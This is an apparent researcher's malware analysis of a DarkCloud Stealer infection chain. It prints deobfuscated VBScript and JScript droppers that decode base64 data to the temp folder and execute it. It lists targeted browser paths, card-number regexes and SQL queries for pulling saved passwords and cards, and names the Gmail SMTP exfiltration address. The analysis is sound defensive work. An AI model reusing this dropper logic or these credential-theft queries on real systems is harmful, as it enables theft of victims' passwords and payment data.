Small Story
By early 2025, the cyber landscape had tilted. Digital defenses adapted quickly—but DarkCloud Stealer, a slick information‑stealer first seen in 2022, had quietly evolved. A new AutoIt‑decoded campaign emerged in January and February 2025, targeting high‑value institutions including Polish government networks and finance companies. These variants hid inside phishing emails and weaponized RAR archives hosted on file‑sharing platforms. When victims downloaded them, an AutoIt executable delivered XOR‑encrypted payloads and shellcode, eventually unlocking the DarkCloud payload in memory
Why did I analyze it?
I saw a DarkCloud sample listed in malware bazaar and just decided to look into it, so maybe I can find new malware sample.
General Malware Flow
It was honestly short compared to other malwares I have worked with.
The thing was, obfuscations were a little bit annoying but easy to deobfuscate. I would even say, these first 3 files had nearly same obfuscation technique used on them. Just a few changes.
First 3 files deobfuscated
Bukti_Transfer.vbs
tJJD = <base64 data>
private function qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq ( asxgYBeRPktTnNmMAYHDbkZtLblVPBcIKZuFtPjkkSSoYGaFXcUNDWCqTEVwQJBNHlJNThSlpWTJR )
CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).DataType = bin.base64
CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).Text = asxgYBeRPktTnNmMAYHDbkZtLblVPBcIKZuFtPjkkSSoYGaFXcUNDWCqTEVwQJBNHlJNThSlpWTJR
qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq = CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).NodeTypedValue
end function
Sub UabNeUPVDYZliECkFVEBrWraz( KLekuYrThvhlvnaSBAdMgwIeFscHHqncJwyLmNTlnvuijzCrYNvBZpZNDAfCwkLrHEczoPfogrZkCZvGpl , jeEhreMLGLMdeMGYfWgkxtABpCvmGCeTgnihSEifsCeAkezGlFIyOaNpeCspjaFDhswrdYGboBruPzQKCoBAufFGZtCQLsvSxaT)
CreateObject( AdoDb.stream ).Type = 1
CreateObject( AdoDb.stream ).Open
CreateObject( AdoDb.stream ).Write jeEhreMLGLMdeMGYfWgkxtABpCvmGCeTgnihSEifsCeAkezGlFIyOaNpeCspjaFDhswrdYGboBruPzQKCoBAufFGZtCQLsvSxaT
CreateObject( AdoDb.stream ).SaveToFile KLekuYrThvhlvnaSBAdMgwIeFscHHqncJwyLmNTlnvuijzCrYNvBZpZNDAfCwkLrHEczoPfogrZkCZvGpl, 2
End Sub
UabNeUPVDYZliECkFVEBrWraz CreateObject( SCRipting.filesystemobject ).getspecialfolder( 2 )\DIFqiByo.js, qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq(tJJD)
CreateObject("WScript.Shell").Run CreateObject( SCRipting.filesystemobject ).getspecialfolder( 2 )\DIFqiByo.js
DIFqiByo.js
XCaAtSSXdBxcDghydxGTzrHLzvIOjsbNfwLultI = "<base64_string>" ;
UHYgIKAlppsqDgDwqEAhaRmVfBdoFM = new ActiveXObject( Scripting.FileSystemObject ).GetSpecialFolder( 2 ) + Fexcel.xls
function zcFEtAhLdQTEBlkhVCFKTZfScCEKhu (XwMAPAhkvmlUNbZQhAbymGZJAivpspBOpiajuMcITJZIvHICMyooIgOQWDzhEssF)
{
var kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK = new ActiveXObject( Microsoft.XMLDOM );.createElement( "YkNWdVKSrzJKfxvQTcyPsOPeKXzGibcGkeEdxvyxSPLiwLuBzPckzYeJUiMGWEkP" );
kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.dataType = bin.base64
kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.text = XwMAPAhkvmlUNbZQhAbymGZJAivpspBOpiajuMcITJZIvHICMyooIgOQWDzhEssF ;
return kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.nodeTypedValue ;
}
function bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd( qXBQJWZQUiIoHxjzsqbmmhMdKDUDBGhMgdyUonWgXZkRYlKpmfJm , XeVvaZUARvxJpMkLnbYRRTEsnPiVfhxRCdUbJsGdkpxZGXttkzgaVqcEacILqzVjxgGMsIBuUvgbWemPVpkfA)
{
var omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu = new ActiveXObject( ADODB.Stream );
omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Open();
omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Type = 1;
omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Write( XeVvaZUARvxJpMkLnbYRRTEsnPiVfhxRCdUbJsGdkpxZGXttkzgaVqcEacILqzVjxgGMsIBuUvgbWemPVpkfA );
omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Position = 0;
omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.SaveToFile( qXBQJWZQUiIoHxjzsqbmmhMdKDUDBGhMgdyUonWgXZkRYlKpmfJm , 2);
omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Close();
}
bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(new ActiveXObject( Scripting.FileSystemObject ).GetSpecialFolder( 2 )\adobe.js, zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(XCaAtSSXdBxcDghydxGTzrHLzvIOjsbNfwLultI));
bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(UHYgIKAlppsqDgDwqEAhaRmVfBdoFM, zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(hwEGxbBGnBNdYyRQfv));
new ActiveXObject( WScript.Shell ).Run(new ActiveXObject( Scripting.FileSystemObject ).GetSpecialFolder( 2 )\adobe.js) ;
new ActiveXObject( WScript.Shell ).Run(UHYgIKAlppsqDgDwqEAhaRmVfBdoFM) ;
adobe.js
WjfOMggRpJFcoITKXbCPawOtniqPc = "<base64_string>";
FTRROHYpgXUatWipcLjFwD = new ActiveXObject( Scripting.FileSystemObject ).GetSpecialFolder( 2 ) \JReSz.exe
function OMqNgoRrQmsuhTxuvdFrvfHuKGQdzBpDyYbuX (TBJfBLfbmhXlhPMXgVClficsWQbhEjZbcsSumKHnCpSkrqXwbpwriWYlZQIlkyXDHvJpwRkV)
{
OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.dataType = bin.base64
OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.text = TBJfBLfbmhXlhPMXgVClficsWQbhEjZbcsSumKHnCpSkrqXwbpwriWYlZQIlkyXDHvJpwRkV ;
return OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.nodeTypedValue ;
}
YnBjXqSbajJqZKnFLbqmzukQhfjfnCSHtrtEGgdmBrmzcGcMFNQSnfZdCkCsGnnYRCxiQiyfxEkIIkoaDWZalzUNRQCWdlfODOiaJtvWOlUivRURvcojONmRijQzgcCMYVEtCNRJbCLAflRAvkaBwvApcQsZdvqmjIKZMbPiKfILCmmwRQEwCAPcVORlVrffMYRXa = ADODB.Stream
function rtSfknqMMIEJPdLbCDSclKEBnUBxRfpHOTAFjGXKhbEnYoSLuTG( aXosOwpwIrDWqJoZgXjEdivCGfHNVNrobCstdWtbAkPcXWgYACeLWsZrbmmiobauzOvoQvwKeHDsTSfjzjNTjgSjcBRrkKnZKVcIbrHFGThPohYJHDjFOGKTwMLPdEZTTdiypWHHbHMPyDuvcIkhbhLDKJMPgsbBuNvKyaTkvbeGtvVsRQ , vakSaKwgseLrCHtcjbJLBqSjyqiuKjUBKOgoZZUTUqjKuJMgEpupYaSFHATkbCWIKKhnaFDKHprLHHppdCpUpedkwbgYFksSUaAkbYFyljiijGyALdGZMBSfhxrzZfEWxYrgHENFwriFvuApcfMbdTGSHUDdhGYGfLlKPSsHQBcUTNjmwBWtSctdRY)
{
AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Open();
AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Type = 1;
AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Write(vakSaKwgseLrCHtcjbJLBqSjyqiuKjUBKOgoZZUTUqjKuJMgEpupYaSFHATkbCWIKKhnaFDKHprLHHppdCpUpedkwbgYFksSUaAkbYFyljiijGyALdGZMBSfhxrzZfEWxYrgHENFwriFvuApcfMbdTGSHUDdhGYGfLlKPSsHQBcUTNjmwBWtSctdRY );
AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Position = 0;
AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.SaveToFile(aXosOwpwIrDWqJoZgXjEdivCGfHNVNrobCstdWtbAkPcXWgYACeLWsZrbmmiobauzOvoQvwKeHDsTSfjzjNTjgSjcBRrkKnZKVcIbrHFGThPohYJHDjFOGKTwMLPdEZTTdiypWHHbHMPyDuvcIkhbhLDKJMPgsbBuNvKyaTkvbeGtvVsRQ ,2 );
AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Close();
}
rtSfknqMMIEJPdLbCDSclKEBnUBxRfpHOTAFjGXKhbEnYoSLuTG(FTRROHYpgXUatWipcLjFwD, OMqNgoRrQmsuhTxuvdFrvfHuKGQdzBpDyYbuX(WjfOMggRpJFcoITKXbCPawOtniqPc))
bEXBUtvehdQuFvkqQVWhBuEzKZZUlaeqRp = new ActiveXObject(Wscript.Shell);
bEXBUtvehdQuFvkqQVWhBuEzKZZUlaeqRp.Run(FTRROHYpgXUatWipcLjFwD) ;
VB Exe
And Finally, adobe.js drops Visual Basic v5.0 compiled 32-bit binary, which serves as stealer, keylogger, logger.
Steals data like:
| Browser Related Data |
|---|
| \Google\Chrome\User Data |
| \Opera Software\Opera Stable |
| \Yandex\YandexBrowser\User Data |
| \360Chrome\Chrome\User Data |
| \Comodo\Dragon\User Data |
| \MapleStudio\ChromePlus\User Data |
| \Chromium\User Data |
| \Torch\User Data |
| \Epic Privacy Browser\User Data |
| \BraveSoftware\Brave-Browser\User Data |
| \Iridium\User Data |
| \7Star\7Star\User Data |
| \Amigo\User Data |
| \CentBrowser\User Data |
| \Chedot\User Data |
| \CocCoc\Browser\User Data |
| \Elements Browser\User Data |
| \Kometa\User Data |
| \Orbitum\User Data |
| \Sputnik\Sputnik\User Data |
| \uCozMedia\Uran\User Data |
| \Vivaldi\User Data |
| \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer |
| \CatalinaGroup\Citrio\User Data |
| \Coowon\Coowon\User Data |
| \liebao\User Data |
| \QIP Surf\User Data |
| \Microsoft\Edge\User Data |
| \Mozilla\Firefox\Profiles |
| \Waterfox\Profiles |
| \K-Meleon\Profiles |
| \Thunderbird\Profiles |
| \Comodo\IceDragon\Profiles |
| \8pecxstudios\Cyberfox\Profiles |
| \NETGATE Technologies\BlackHawK\Profiles |
| \Moonchild Pro2ductions\Pale Moon\Profiles |
| Card Related Data |
|---|
| username_value |
| name_on_card |
| expiration_month\expiration_year |
| card_number_encrypted |
| ^389[0-9]{11}$ |
| Amex Card |
| ^(6541|6556)[0-9]{12}$ |
| Carte Blanche Card |
| ^3(?:0[0-5]|[68][0-9])[0-9]{11}$ |
| Diners Club Card |
| 6(?:011|5[0-9]{2})[0-9]{12}$ |
| Discover Card |
| ^63[7-9][0-9]{13}$ |
| Insta Payment Card |
| ^(?:2131|1800|35\d{3})\d{11}$ |
| JCB Card |
| ^9[0-9]{15}$ |
| KoreanLocalCard |
| ^(6304|6706|6709|6771)[0-9]{12,15}$ |
| Laser Card |
| ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$ |
| Maestro Card |
| 5[1-5][0-9]{14}$ |
| Mastercard |
| 3[47][0-9]{13}$ |
| Express Card |
| ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$ |
| Solo Card |
| ^(62[0-9]{14,17})$ |
| Union Pay Card |
| 4[0-9]{12}(?:[0-9]{3})?$ |
| Visa Card |
| ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$ |
| Visa Master Card |
| ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$ |
Other than that, it uses showip.net to get IP address of the victim.
Uses mysql queries, some of the queries:
SELECT origin_url, username_value, password_value, length(password_value) FROM logins
SELECT origin_url, username_value, password_value FROM logins
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
etc.
How data is sent
Uses smtp.gmail.com service to send data to "Williamsaustin2099@gmail.com"
That's all for this malware.
Note: The VB binary was uploaded by JAMESWT_WT (2025-08-01) before me, most likely different case but same malware used for stealing, logging etc.